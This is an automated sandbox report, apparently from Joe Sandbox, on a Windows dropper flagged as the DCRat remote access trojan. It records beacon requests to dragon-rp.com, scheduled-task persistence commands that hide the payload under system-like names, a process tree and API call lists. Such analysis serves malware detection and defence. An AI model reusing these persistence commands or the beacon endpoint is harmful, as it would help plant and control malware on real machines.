Jan 7, 2025 21:02:08.014226913 CET	192.168.2.5	1.1.1.1	0x4f	Standard query (0)	dragon-rp.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 21:02:08.027549028 CET	1.1.1.1	192.168.2.5	0x4f	No error (0)	dragon-rp.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:02:08.027549028 CET	1.1.1.1	192.168.2.5	0x4f	No error (0)	dragon-rp.com		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dragon-rp.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	188.114.96.3	80	1488	C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 21:02:08.039757967 CET	518	OUT	GET /L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238935c1031b2c1aa4e736=b01c62c75854535ad755531ad6f347a7&e7e185b24f1d9f944fc8872c063e4284=QYwQTM1MjZmhTOxQjZzY2NlVGO3cTMzMGOjRDO2EDMhZDO5IjN4QjZ&bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: dragon-rp.com Connection: Keep-Alive
Jan 7, 2025 21:02:08.589891911 CET	957	IN	HTTP/1.1 521 Date: Tue, 07 Jan 2025 20:02:08 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFDX2PAT6Q9CF2Ogs5zSh%2FWJsM2bisVagbcq5bOumQx%2BscnLs6mVipP5QA4SLBG0xgmJq%2BN9mQfAvUhvjAWuRfL89o1KuK%2B2RSCqcP2pODJJCgN0SvZYGnp%2FDAoL9YX7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8fe68b32c9380f90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1484&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=518&delivery_rate=0&cwnd=107&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31 Data Ascii: error code: 521
Jan 7, 2025 21:02:08.606672049 CET	494	OUT	GET /L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238935c1031b2c1aa4e736=b01c62c75854535ad755531ad6f347a7&e7e185b24f1d9f944fc8872c063e4284=QYwQTM1MjZmhTOxQjZzY2NlVGO3cTMzMGOjRDO2EDMhZDO5IjN4QjZ&bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: dragon-rp.com
Jan 7, 2025 21:02:08.852709055 CET	964	IN	HTTP/1.1 521 Date: Tue, 07 Jan 2025 20:02:08 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2B%2BW8NX31aUMbFxQhF8LuIE4gSfORxUGQrhlMxZT5eauWPvhO8Aqsl%2BVP3umY6Ggd20Lklrz9oYoThpL3h86xQUsXCzLRANfTphHEpnwdN1OYieFSRRkwpjViLzE%2BfSA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8fe68b343ac50f90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2979&min_rtt=1484&rtt_var=3547&sent=4&recv=6&lost=0&retrans=0&sent_bytes=957&recv_bytes=1012&delivery_rate=108558&cwnd=108&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31 Data Ascii: error code: 521

Target ID:	0
Start time:	15:01:53
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\QoRXFaE8Xn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QoRXFaE8Xn.exe"
Imagebase:	0x8c0000
File size:	1'164'970 bytes
MD5 hash:	08E95DABB86201EEB98188769E4FCD62
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:01:53
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe"
Imagebase:	0xcb0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:02:01
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\PortcomAgentwinbroker\1uTBfrpLb993XlgcpIpPee79uOtZ.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:02:01
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:02:01
Start date:	07/01/2025
Path:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
Wow64 process (32bit):	false
Commandline:	"C:\PortcomAgentwinbroker\Runtimemonitor.exe"
Imagebase:	0x9f0000
File size:	847'872 bytes
MD5 hash:	2EFFCBFE83A6E643D620BD7221B8D4CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2109875192.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2109875192.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:02:02
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 6 /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:02:02
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeq" /sc ONLOGON /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:02:02
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 14 /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:02:02
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe'" /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:02:02
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeq" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:02:03
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:02:03
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:02:03
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:02:03
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:02:03
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dasHost.exe'" /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:02:03
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Recovery\dasHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:02:03
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 9 /tr "'C:\Recovery\dasHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6807a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:02:03
Start date:	07/01/2025
Path:	C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe"
Imagebase:	0x790000
File size:	847'872 bytes
MD5 hash:	2EFFCBFE83A6E643D620BD7221B8D4CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.2159872323.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:02:04
Start date:	07/01/2025
Path:	C:\Recovery\dasHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\dasHost.exe
Imagebase:	0x590000
File size:	847'872 bytes
MD5 hash:	2EFFCBFE83A6E643D620BD7221B8D4CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.2215363217.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:02:05
Start date:	07/01/2025
Path:	C:\Recovery\dasHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\dasHost.exe
Imagebase:	0xd0000
File size:	847'872 bytes
MD5 hash:	2EFFCBFE83A6E643D620BD7221B8D4CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2214484394.00000000023A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2214484394.0000000002361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:02:05
Start date:	07/01/2025
Path:	C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe"
Imagebase:	0xc60000
File size:	847'872 bytes
MD5 hash:	2EFFCBFE83A6E643D620BD7221B8D4CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.2213895639.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:02:05
Start date:	07/01/2025
Path:	C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe"
Imagebase:	0xfc0000
File size:	847'872 bytes
MD5 hash:	2EFFCBFE83A6E643D620BD7221B8D4CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.2214669811.0000000003328000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.2214669811.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:02:05
Start date:	07/01/2025
Path:	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe"
Imagebase:	0x70000
File size:	847'872 bytes
MD5 hash:	2EFFCBFE83A6E643D620BD7221B8D4CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2214448921.0000000002361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:02:05
Start date:	07/01/2025
Path:	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe"
Imagebase:	0x8a0000
File size:	847'872 bytes
MD5 hash:	2EFFCBFE83A6E643D620BD7221B8D4CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2214661372.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2214661372.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.4%
Total number of Nodes:	1514
Total number of Limit Nodes:	32

Executed Functions

Function 008DD5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008D00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008D00E4
Part of subcall function 008D00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008D00F6
Part of subcall function 008D00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008D0127

Part of subcall function 008D9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 008D9DAC

Part of subcall function 008DA335: OleInitialize.OLE32(00000000), ref: 008DA34E
Part of subcall function 008DA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008DA385
Part of subcall function 008DA335: SHGetMalloc.SHELL32(00908430), ref: 008DA38F

Part of subcall function 008D13B3: GetCPInfo.KERNEL32(00000000,?), ref: 008D13C4
Part of subcall function 008D13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008D13D8

GetCommandLineW.KERNEL32 ref: 008DD61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 008DD643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 008DD654
UnmapViewOfFile.KERNEL32(00000000), ref: 008DD68E

Part of subcall function 008DD287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 008DD29D
Part of subcall function 008DD287: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008DD2D9

CloseHandle.KERNEL32(00000000), ref: 008DD697
GetModuleFileNameW.KERNEL32(00000000,0091DC90,00000800), ref: 008DD6B2
SetEnvironmentVariableW.KERNEL32(sfxname,0091DC90), ref: 008DD6BE
GetLocalTime.KERNEL32(?), ref: 008DD6C9
_swprintf.LIBCMT ref: 008DD708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 008DD71A
GetModuleHandleW.KERNEL32(00000000), ref: 008DD721
LoadIconW.USER32(00000000,00000064), ref: 008DD738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 008DD789
Sleep.KERNEL32(?), ref: 008DD7B7
DeleteObject.GDI32 ref: 008DD7F0
DeleteObject.GDI32(?), ref: 008DD800
CloseHandle.KERNEL32 ref: 008DD843

Strings

C:\Users\user\Desktop, xrefs: 008DD5E9
sfxstime, xrefs: 008DD715
STARTDLG, xrefs: 008DD77E
sfxname, xrefs: 008DD6B9
winrarsfxmappingfile.tmp, xrefs: 008DD637
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 008DD6F9

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-2656992072
Opcode ID: f2b64d593fffce0eb93986f229883b81668005b955bf4f24ba94e76c31e84f0f
Instruction ID: 3277795e368d7dc8e5eb0af2312d6fe35a6c5d165f8fac240bce1018a2aa9932
Opcode Fuzzy Hash: f2b64d593fffce0eb93986f229883b81668005b955bf4f24ba94e76c31e84f0f
Instruction Fuzzy Hash: EA61A071A18341AFD320AB79EC49F7B37A8FB85744F00062AF585D23A1DF749944E7A2

Function 008D9E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(008DAE4D,PNG,?,?,?,008DAE4D,00000066), ref: 008D9E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,008DAE4D,00000066), ref: 008D9E46
LoadResource.KERNEL32(00000000,?,?,?,008DAE4D,00000066), ref: 008D9E59
LockResource.KERNEL32(00000000,?,?,?,008DAE4D,00000066), ref: 008D9E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,008DAE4D,00000066), ref: 008D9E82
GlobalLock.KERNEL32(00000000), ref: 008D9E93
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 008D9EB7
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 008D9EFC
GlobalUnlock.KERNEL32(00000000), ref: 008D9F1B
GlobalFree.KERNEL32(00000000), ref: 008D9F22

Strings

PNG, xrefs: 008D9E1F

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: 42aed586b67dc9b26f53613acbc2973bdbd615f2e6fbc3687b74359545f06954
Instruction ID: 963174aee02caab5bdaa53b7f9131cc12b82a6108fefee355c21634c8e91b84c
Opcode Fuzzy Hash: 42aed586b67dc9b26f53613acbc2973bdbd615f2e6fbc3687b74359545f06954
Instruction Fuzzy Hash: FC318F71208306AFC7109F31EC48E2BBBADFF85751B040A1AF946E2360EB71DC40DA61

Function 008CA5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,008CA4EF,000000FF,?,?), ref: 008CA628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,008CA4EF,000000FF,?,?), ref: 008CA65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,008CA4EF,000000FF,?,?), ref: 008CA66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,008CA4EF,000000FF,?,?), ref: 008CA692
GetLastError.KERNEL32(?,?,?,?,008CA4EF,000000FF,?,?), ref: 008CA69E

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 354d9769f54f1daad1143abaabf2b53048ab493077f80182fab8521d50874e24
Instruction ID: 00400defeb61f6b1776d5485f3cb3bb91df123ac3fa3794108d9e8545405a382
Opcode Fuzzy Hash: 354d9769f54f1daad1143abaabf2b53048ab493077f80182fab8521d50874e24
Instruction Fuzzy Hash: A6412B76504645AFC324EF68C884EEAF7F8FB98354F040A2EF599D3240E774E9548B92

Function 008E753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,008E7513,00000000,008FBAD8,0000000C,008E766A,00000000,00000002,00000000), ref: 008E755E
